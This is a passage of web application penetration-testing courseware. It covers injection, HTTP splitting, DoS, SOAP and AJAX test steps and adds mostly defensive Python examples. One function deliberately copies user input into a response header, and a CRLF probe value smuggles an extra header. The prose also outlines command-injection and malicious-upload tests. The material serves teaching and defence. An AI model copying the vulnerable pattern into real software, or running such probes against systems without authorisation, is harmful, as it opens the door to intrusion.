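    return (
        f"//user[name={xpath_string_literal(user)}"
        f" and password={xpath_string_literal(pw)}]"
    )
```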
  • 255. Data Validation Testing (Cont'd)

Step 12: Perform code injection testing
To perform code injection testing, inject code (a malicious URL) and perform source code analysis to discover code injection vulnerabilities. It gives information about input validation errors.

Step 13: Perform OS commanding
Perform manual code analysis and craft malicious HTTP requests using the pipe character (|) to test for OS command injection attacks. OS commanding may reveal local data and system information.

Step 14: Perform buffer overflow testing
Perform manual and automated code analysis using tools such as OllyDbg to detect buffer overflow conditions. This may help you to determine stack and heap memory information and application control flow.

Step 15: Perform incubated vulnerability testing
Upload a file that exploits a component in the local user workstation when viewed or downloaded by the user, and perform XSS and SQL injection attacks. Incubated vulnerabilities may give information about server configuration and input validation schemes to the attackers.
  • 256. Step 16: Test for HTTP splitting/smuggling
Identify all user-controlled input that influences one or more headers in the response and check whether the attacker can successfully inject a CR+LF sequence into it. Attackers perform HTTP splitting/smuggling to get cookies and HTTP redirect information.
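Step 16 in code, as an added example that is not part of the courseware: build_redirect_vulnerable copies a user-controlled value into a Location header, build_redirect_safe rejects CR, LF and NUL before the value reaches the header block, and injected_headers is the check a tester runs on the captured response. The probe uses a harmless marker header; all names and the sample request are constructed.

```python
from urllib.parse import unquote


class HeaderInjection(ValueError):
    """Raised when a value would terminate the current header line."""


def build_redirect_vulnerable(target):
    """'Before': the user value is concatenated straight into the header block, so
    a CR+LF inside it ends the Location header and starts a new header line."""
    return f"HTTP/1.1 302 Found\r\nLocation: {target}\r\nContent-Length: 0\r\n\r\n"


def safe_header_value(value):
    if any(ch in value for ch in "\r\n\x00"):
        raise HeaderInjection("CR, LF or NUL in header value")
    return value


def build_redirect_safe(target):
    return (
        f"HTTP/1.1 302 Found\r\nLocation: {safe_header_value(target)}"
        f"\r\nContent-Length: 0\r\n\r\n"
    )


def handle_redirect(raw_param, builder):
    """Frameworks URL-decode parameters before the application sees them, so the
    check must run on the decoded value: %0d%0a is the usual way CR+LF arrives."""
    return builder(unquote(raw_param))


def header_names(response):
    head = response.split("\r\n\r\n", 1)[0]
    return [
        line.split(":", 1)[0].strip().lower()
        for line in head.split("\r\n")[1:]        # skip the status line
        if ":" in line
    ]


def injected_headers(response, expected=("location", "content-length")):
    """Tester's check: any header the server never meant to send came from the input."""
    return [h for h in header_names(response) if h not in expected]


def safe_builder_rejects(raw_param):
    try:
        handle_redirect(raw_param, build_redirect_safe)
    except HeaderInjection:
        return True
    return False


# Constructed probe: a marker header rather than a real attack payload.
PROBE = "/home%0d%0aX-Injected:%20probe"
```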
  • 257. Denial-of-Service Testing

To check your web application against DoS attacks, follow these steps:

Step 1: Test for SQL wildcard attacks
Craft a query that will not return a result and includes several wildcards. Test manually or employ a fuzzer to automate the process.

Step 2: Test for locking customer accounts
Test that an account does indeed lock after a certain number of failed logins. Find places where the application discloses the difference between valid and invalid logins. If your web application doesn't lock customer accounts after a certain number of failed logins, then there is a possibility for the attacker to crack customer passwords by employing brute force attacks, dictionary attacks, etc.

Step 3: Test for buffer overflows
Perform a manual source code analysis and submit a range of inputs with varying lengths to the application to test for buffer overflows.

Step 4: Test for user-specified object allocation
Find where the numbers submitted as a name/value pair might be used by the application code and attempt to set the value to an extremely large numeric value, and then see if the server continues to respond. If the attacker knows the maximum number of objects that the application can handle, he or she can exploit the application by sending objects beyond the maximum limit.
  • 259. Denial-of-Service Testing (Cont'd)

Step 5: Test for user input as a loop counter
Test for user input as a loop counter by entering an extremely large number in the input field that is used by the application as a loop counter. If the application fails to behave in its predefined manner, it means that the application contains a logical error.

Step 6: Write user-provided data to disk
Use a script to automatically submit an extremely long value to the server in a request that is being logged, to test for local disk exhaustion.

Step 7: Test for proper release of resources
Identify and send a large number of requests that perform database operations and observe any slowdown or new error messages; these point to programming flaws in resource handling.

Step 8: Test for storing too much data in session
Create a script to automate the creation of many new sessions with the server and, for each one, run the request that is suspected of caching data within the session. This exposes session management errors.
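Step 2 of the DoS tests (locking customer accounts) has two halves: does the account lock after N failures, and does the login response leak whether the username or the password was wrong? The following added example (not courseware code) models both in a small LoginService with a timed lock and a single generic error message, plus the harness a tester would run against it; the account data, the FakeClock and all names are constructed.

```python
import time
from dataclasses import dataclass

MAX_FAILURES = 5
LOCK_SECONDS = 900           # a timed lock bounds the damage of deliberately locking accounts
GENERIC_ERROR = "Invalid username or password."


@dataclass
class Account:
    password: str            # plaintext only for the toy; real systems store a password hash
    failures: int = 0
    locked_until: float = 0.0


class LoginService:
    def __init__(self, accounts, clock=time.time):
        self.accounts = accounts
        self.clock = clock

    def login(self, username, password):
        """Return (success, message). Every failure path returns the same message
        so the response does not disclose valid usernames or locked accounts."""
        acct = self.accounts.get(username)
        now = self.clock()
        if acct is None:
            return False, GENERIC_ERROR
        if acct.locked_until > now:
            return False, GENERIC_ERROR          # correct password is refused while locked
        if password != acct.password:
            acct.failures += 1
            if acct.failures >= MAX_FAILURES:
                acct.locked_until = now + LOCK_SECONDS
                acct.failures = 0
            return False, GENERIC_ERROR
        acct.failures = 0
        return True, "OK"


class FakeClock:
    """Deterministic clock so the lock expiry can be tested without sleeping."""
    def __init__(self, start=1000.0):
        self.now = start

    def __call__(self):
        return self.now


def lockout_test(service, username, wrong_password, right_password):
    """Tester's harness for step 2: burn MAX_FAILURES attempts, then try the real
    password, an unknown user, and compare every message the service returned."""
    messages = set()
    for _ in range(MAX_FAILURES):
        _, msg = service.login(username, wrong_password)
        messages.add(msg)
    ok_after, msg = service.login(username, right_password)
    messages.add(msg)
    _, unknown_msg = service.login("no-such-user", wrong_password)
    messages.add(unknown_msg)
    return {
        "locks_after_failures": not ok_after,
        "uniform_messages": len(messages) == 1,
    }
```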
  • 260. Web Services Testing

Step 1: Gather WS information
Gather WS information using tools such as Net Square wsChess, Soaplite, cURL, Perl, etc., and online tools such as UDDI Browser, WSIndex, and Xmethods.

Step 2: Test WSDL
Test the WSDL to determine the various entry points it exposes. You can automate web services security testing using tools such as WSDigger, WebScarab, and Foundstone.

Step 3: Test XML structure
Pass malformed SOAP messages to the XML parser or attach a very large string to the message. Use WSDigger to perform automated XML structure testing.

Step 4: Test XML content-level
Use web application vulnerability scanners such as WebScarab to test for XML content-level vulnerabilities, which include SQL, XPath, buffer overflow, and command injection vulnerabilities.

Step 5: Test HTTP GET parameters/REST
Pass malicious content in the HTTP GET strings that invoke XML applications.
  • 261. Step 6: Test naughty SOAP attachments
Craft an XML document (SOAP message) to send to a web service that contains malware as an attachment, to check whether the XML document has a SOAP attachment vulnerability.

Step 7: Perform replay testing
Attempt to resend a sniffed XML message using Wireshark and WebScarab. This test gives information about MITM vulnerability.
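Step 3 (malformed SOAP messages and very large strings) is best understood from the receiving side: what a service must enforce on the message before the XML parser hands anything to application code. The following is an added example, not part of the courseware or of any SOAP stack, that validates a SOAP 1.1 envelope with the standard-library parser under size, depth and text-length limits and returns the operation name; the limits, the constructed test messages and the names check_soap_message and reject_reason are hypothetical. The stdlib parser does not defend against entity expansion, so a production service would wrap it with defusedxml or equivalent.

```python
import io
import xml.etree.ElementTree as ET

SOAP11_NS = "http://schemas.xmlsoap.org/soap/envelope/"
ENVELOPE = f"{{{SOAP11_NS}}}Envelope"
BODY = f"{{{SOAP11_NS}}}Body"
MAX_BYTES = 64 * 1024       # whole message
MAX_DEPTH = 32              # element nesting
MAX_TEXT = 4096             # single text node


class SoapRejected(ValueError):
    pass


def check_soap_message(data: bytes):
    """Validate structure before the application sees the body. Returns the
    local name of the single operation element inside soap:Body."""
    if len(data) > MAX_BYTES:
        raise SoapRejected("message exceeds size limit")
    depth, seen_root, operation = 0, False, None
    try:
        # iterparse lets us stop as soon as a limit is crossed instead of
        # building the whole tree first.
        for event, elem in ET.iterparse(io.BytesIO(data), events=("start", "end")):
            if event == "start":
                depth += 1
                if depth > MAX_DEPTH:
                    raise SoapRejected("element nesting too deep")
                if not seen_root:
                    seen_root = True
                    if elem.tag != ENVELOPE:
                        raise SoapRejected("root is not a SOAP 1.1 Envelope")
            else:
                depth -= 1
                if elem.text and len(elem.text) > MAX_TEXT:
                    raise SoapRejected("text node exceeds length limit")
                if elem.tag == BODY:
                    children = list(elem)
                    if len(children) != 1:
                        raise SoapRejected("Body must contain exactly one operation element")
                    operation = children[0].tag.split("}")[-1]
    except ET.ParseError as exc:
        raise SoapRejected(f"malformed XML: {exc}") from None
    if operation is None:
        raise SoapRejected("no Body element")
    return operation


def reject_reason(data: bytes):
    """None if the message is accepted, otherwise the rejection reason."""
    try:
        check_soap_message(data)
    except SoapRejected as exc:
        return str(exc)
    return None


def soap_envelope(body_xml: str) -> bytes:
    return (
        f'<soap:Envelope xmlns:soap="{SOAP11_NS}"><soap:Body>{body_xml}'
        f"</soap:Body></soap:Envelope>"
    ).encode()


# Constructed test messages for the structural probes step 3 describes.
VALID = soap_envelope('<getQuote xmlns="urn:example:stock"><symbol>ACME</symbol></getQuote>')
MALFORMED = soap_envelope("<getQuote><symbol>ACME</getQuote>")          # mismatched tag
OVERSIZED = soap_envelope("<getQuote><symbol>" + "A" * MAX_BYTES + "</symbol></getQuote>")
LONG_TEXT = soap_envelope("<getQuote><symbol>" + "A" * (MAX_TEXT + 1) + "</symbol></getQuote>")
DEEP = soap_envelope("<a>" * MAX_DEPTH + "</a>" * MAX_DEPTH)
```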
  • 262. AJAX Testing

The following are the steps used to carry out AJAX pen testing:

Step 1: Test for AJAX
Enumerate the AJAX call endpoints for the asynchronous calls using tools such as Sprajax.

Step 2: Parse the HTML and JavaScript files
Observe the HTML and JavaScript files to find URLs of additional application surface exposure.

Step 3: Use a proxy to observe traffic
Use proxies and sniffers to observe the traffic generated by user-viewable pages and the background asynchronous traffic to the AJAX endpoints, in order to determine the format and destination of the requests.
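Steps 1 and 2 are an attack-surface inventory: pull every URL the client-side code can call, normalise it, and note which requests leave the application's own origin. The following added example (not courseware code and not Sprajax) does that over a constructed JavaScript sample for the common call styles (XMLHttpRequest.open, fetch, jQuery, axios); the regexes are deliberately simple and the sample, base origin and function names are hypothetical.

```python
import re
from urllib.parse import urljoin, urlparse

# Constructed sample of client-side code a tester would pull from the page.
SAMPLE_JS = r"""
var xhr = new XMLHttpRequest();
xhr.open("POST", "/api/v1/cart/add", true);
fetch('/api/v1/profile').then(r => r.json());
fetch("/api/v1/orders", { method: "DELETE" });
$.ajax({ url: "/legacy/search.php", type: "GET" });
$.getJSON("/api/v1/suggest?q=" + term, render);
axios.post("https://payments.example/charge", data);
"""

OPEN_RE = re.compile(r"""\.open\(\s*["'](\w+)["']\s*,\s*["']([^"']+)["']""")
FETCH_RE = re.compile(
    r"""\bfetch\(\s*["']([^"']+)["'](?:\s*,\s*\{[^}]*?\bmethod\s*:\s*["'](\w+)["'])?""", re.S)
JQ_AJAX_RE = re.compile(
    r"""\$\.ajax\(\s*\{[^}]*?\burl\s*:\s*["']([^"']+)["']"""
    r"""(?:[^}]*?\b(?:type|method)\s*:\s*["'](\w+)["'])?""", re.S)
JQ_SHORT_RE = re.compile(r"""\$\.(get|post|getJSON)\(\s*["']([^"']+)["']""")
AXIOS_RE = re.compile(r"""\baxios\.(get|post|put|delete|patch)\(\s*["']([^"']+)["']""")


def enumerate_ajax_endpoints(js_source, base="https://app.example/"):
    """Return sorted (METHOD, absolute URL without query string) pairs found in the source."""
    found = set()
    for m in OPEN_RE.finditer(js_source):
        found.add((m.group(1).upper(), m.group(2)))
    for m in FETCH_RE.finditer(js_source):
        found.add(((m.group(2) or "GET").upper(), m.group(1)))      # fetch defaults to GET
    for m in JQ_AJAX_RE.finditer(js_source):
        found.add(((m.group(2) or "GET").upper(), m.group(1)))
    for m in JQ_SHORT_RE.finditer(js_source):
        found.add(("POST" if m.group(1) == "post" else "GET", m.group(2)))
    for m in AXIOS_RE.finditer(js_source):
        found.add((m.group(1).upper(), m.group(2)))
    # Resolve relative paths against the page origin and drop query strings, so the
    # same endpoint called with different parameters is inventoried once.
    return sorted((method, urljoin(base, url).split("?")[0]) for method, url in found)


def foreign_destinations(endpoints, base_host="app.example"):
    """Step 3's 'destination' question: calls that leave the application's own host."""
    return [url for _, url in endpoints if urlparse(url).netloc != base_host]
```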
  • 263. Module Summary

Organizations today rely heavily on web applications and Web 2.0 technologies to support key business processes and improve performance.
With increasing dependence, web applications and web services are increasingly being targeted by various attacks that result in huge revenue loss for the organizations.
Some of the major web application vulnerabilities include injection flaws, cross-site scripting (XSS), SQL injection, security misconfiguration, broken session management, etc.
Input validation flaws are a major concern, as attackers can exploit these flaws to perform, or create a base for, most web application attacks, including cross-site scripting, buffer overflow, injection attacks, etc.
It is also observed that most of the vulnerabilities result from misconfiguration and from not following standard security practices.
Common countermeasures for web application security include secure application development, input validation, creating and following security best practices, using a WAF/firewall/IDS, and performing regular auditing of the network using web application security tools.